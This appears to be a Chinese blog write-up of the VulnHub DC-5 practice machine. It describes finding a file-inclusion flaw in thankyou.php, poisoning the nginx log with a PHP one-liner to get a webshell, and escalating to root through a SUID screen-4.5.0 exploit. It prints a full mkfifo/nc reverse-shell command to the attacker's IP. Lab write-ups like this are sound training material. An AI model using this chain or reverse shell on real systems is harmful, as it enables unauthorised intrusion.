Vulnhub靶机渗透学习记录:DC-5

最新推荐文章于 2024-03-25 20:07:11 发布
最新推荐文章于 2024-03-25 20:07:11 发布
阅读量458 收藏
点赞数
文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Youanddream/article/details/122484316
版权

目录

环境搭建

  1. 攻击机:Kali-Linux2020.4(VmwareWorkstation)
  2. 靶机:DC-5(VirtualBox)
  3. DC-5靶机下载链接:https://www.vulnhub.com/entry/dc-5,314/
  4. Kali与DC-5配置桥接模式,并桥接到同一张网卡
  5. Kali的IP地址如下:
    在这里插入图片描述

信息收集

  1. 先使用Nmap探测Kali与DC-5所在网段存活主机,找到DC-5的IP地址:192.168.1.13
    在这里插入图片描述

  2. 进行全端口扫描,并对端口进行版本识别,发现3个端口,但只有80端口可以进行访问 :
    在这里插入图片描述
    在这里插入图片描述

  3. 访问80端口,发现了Web页面。在contact页面发现一个表单,填写并提交,提交后发现页脚的年份从2019变成了2020。
    在这里插入图片描述
    在这里插入图片描述

  4. 直接访问/thankyou.php这个文件,发现每次访问或者刷新,年份都会变化。这里很奇怪。但还未发现问题出现在哪里。
    在这里插入图片描述
    在这里插入图片描述

目录爆破

  1. 把Web页面翻了个遍,除了contact.php可以提交数据并且thankyou.php中年份有点奇怪之外,其他几个文件都是静态的,并没有什么发现。所以接下来爆破以下目录。使用宿主机上的御剑进行爆破。
    在这里插入图片描述
  2. 对爆破出的路径都尝试了访问,只有footer.php是新发现的,其他的都重新定向回到了初始页面。而footer.php显示了页脚信息。并且这个页面刷新后年份也会改变。这里考虑到thankyou.php这个文件可能调用了footer.php文件,用来显示页脚信息。所以考虑thankyou.php可能存在文件包含漏洞。
    在这里插入图片描述
    在这里插入图片描述

文件包含getshell

参数爆破

  1. 通过以上的分析,我们认为thankyou.php这个文件中可能存在文件包含漏洞,但不管是从URL还是文件源码都没有发现文件包含所用到的参数。所以尝试爆破用来包含文件的参数。
  2. 使用Burp访问thankyou.php,抓一个包发送到Intruder模块,并设置好爆破点,如下图。
    在这里插入图片描述
  3. 导入常用参数爆破字典,可在GitHub上查找。
    在这里插入图片描述
  4. 开始爆破,通过爆破发现file参数响应报文的长度与其他参数不同,查看页面发现这个页面中的页脚信息没有显示,因为在设置爆破Payload时,设置了参数的值为空。所以会导致页脚信息消失,这也进一步证明了file就是我们要找的文件包含的参数。
    在这里插入图片描述
  5. 将访问thankyou.php的请求发送到Repeater模块,尝试包含/etc/passwd,发现成功包含。
    在这里插入图片描述

文件包含利用

  1. 由于对文件包含的利用方式不是很了解,所以在利用上进行了一些尝试,最后通过包含服务器日志文件来获取shell。参考文章:干货 | 文件包含漏洞利用方式总结与防御

  2. 在信息收集阶段,就发现Web服务器是nginx,所以需要找到nginx的日志文件所在的路径。
    在这里插入图片描述
    通过搜索,找到了日志文件所在的路径。

    /var/log/nginx/access.log
/var/log/nginx/errors.log

  3. 通过文件包含,成功包含访问日志文件。
    在这里插入图片描述

  4. 查看日志的内容,可以发现日志记录了访问Web页面的记录,记录中记录了请求、UA、IP等信息。
    在这里插入图片描述

  5. 尝试通过将UA信息修改为PHP一句话,从而获取到一个蚁剑shell。
    用Burp抓包,将UA信息修改为PHP一句话,然后放包。
    在这里插入图片描述
    再次访问日志,发现了上一步的请求信息,发现加入的UA信息并没有显示出了,可能是被浏览器解析了。
    在这里插入图片描述
    所以尝试用蚁剑进行连接,发现可以成功连接。成功获取到shell。
    在这里插入图片描述
    进入后,查看thankyou.php文件,发现文件包含漏洞的位置,这明显故意的😀。
    在这里插入图片描述

  6. 反弹一个shell到Kali,由于靶机上的nc不存在-e参数,所以在Kali上侦听后,在蚁剑终端中使用如下命令进行反弹shell。
    在Kali上执行:

    	nc -lvnp 8888

    在这里插入图片描述
    在蚁剑终端上执行:

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.12 8888 >/tmp/f

    在这里插入图片描述

    nc成功接收到shell:
    在这里插入图片描述

权限提升

  1. 使用sudo -l 查看有无有特殊权限的文件,发现直接没有sudo命令。
    在这里插入图片描述

  2. 查看是否有SUID提权,发现一个叫screen-4.5.0的程序。

    find / -user root -perm -4000 -print 2>/dev/null

    在这里插入图片描述

  3. 使用searchsploit尝试搜索exp,居然直接搜索到提权脚本。

    searchsploit screen-4.5.0

    在这里插入图片描述

  4. 查看提权脚本的内容,发现是一个bash脚本,会编译并运行C语言代码,达到提权的目的。
    在这里插入图片描述

  5. 将该脚本上传到靶机,尝试进行提权。
    Kali:复制该脚本到/tmp目录后,使用python开启一个服务供靶机下载脚本。

    python -m SimpleHTTPServer

    在这里插入图片描述
    靶机:切换到/tmp目录下,使用wget下载脚本文件。
    在这里插入图片描述

  6. 给下载好的脚本加上权限,并执行。但是发现脚本文件有点问题,前面遇到过这个问题,是脚本中的编码错误。
    在这里插入图片描述

  7. 在Kali端使用Vim尝试修改文件。只需要Vim打开文件,然后键入以下内容后,回车,保存退出便可。

    :set ff=unix

    在这里插入图片描述

  8. 重新将文件下载到上,修改权限,并尝试执行。发现成功获取到root权限。
    在这里插入图片描述

  9. 在/root目录下,成功获取到flag。
    在这里插入图片描述

T1des_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5927
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-5靶机
最新发布
mlws1900的博客
03-25 752
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。我们可以利用nginx日志写入一句话木马。切换nat模式,有问题全选重试和是,打到这了,我感觉这个配置我都不用写了,启动靶机如下图所示即可。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
vulnhub靶机DC5
weixin_52450702的博客
11-03 159
vulnhub靶机DC5
DC-5靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-30 2785
dc-5靶场详细渗透过程
kali渗透DC-5
余笙.'的博客
12-05 1060
kali渗透DC- 5靶机
Vulnhub靶机渗透学习——DC-5
qq_45612828的博客
10-21 137
wfuzz 文件包含参数文件包含 nginx 日志文件 getshell 方式screen4.5.0 版本进行提权操作。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub-DC-5靶机实战
御七彩虹猫
05-18 867
Vulnhub-DC-5靶机实战
DC-5靶机详细渗透过程
MRS_jianai的博客
12-21 512
DC-5靶机详细渗透过程
Vulnhub-dc5学习笔记
weixin_42820274的博客
07-03 372
Vulnhub-dc5学习笔记
Vulnhub渗透测试靶机DC-5
weixin_46128614的博客
01-19 579
靶机下载地址:https://www.vulnhub.com/entry/dc-5,314/ nmap –sS –sV –p- -T5 192.168.49.19 dirb 跑一下目录 都是常规页面 但是这个footer.php每次访问都不一样 碰巧发现thankyou.php每次访问也不一样 此处应该存在一个文件包含,把footer.php包含了进来 我们用wfuzz模糊测试一下,找到...
Vulnhub靶机实战——DC-5
冠霖L的博客
10-27 4864
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.145 DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145 ...
靶机实战(DC-5)
weixin_45605313的博客
07-01 279
DC-5实验环境实验过程信息收集主机发现端口扫描服务发现网站指纹目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机DC-4 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 服务发现 网站指纹 目录扫描 dribuster:使用/u
DC-5 vulnhub靶机实战
Cosmopolitan的博客
06-16 2515
首先是使用virtualbox安装,这里不推荐vmware,会出很多问题。 nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口。 给了提示是个文件包含漏洞,发现在thinkyou.php里面存在,验证一下。 可以读到/etc/passwd文件。 接下来就可以利用nginx的日志记录功能,将一句话写入到access.log里面,然后用tha...
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
在这篇文章中,我们将学习如何搭建Vulnhub靶机渗透环境,并学习JIS-CTF入门知识,以及蚁剑提权示例。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值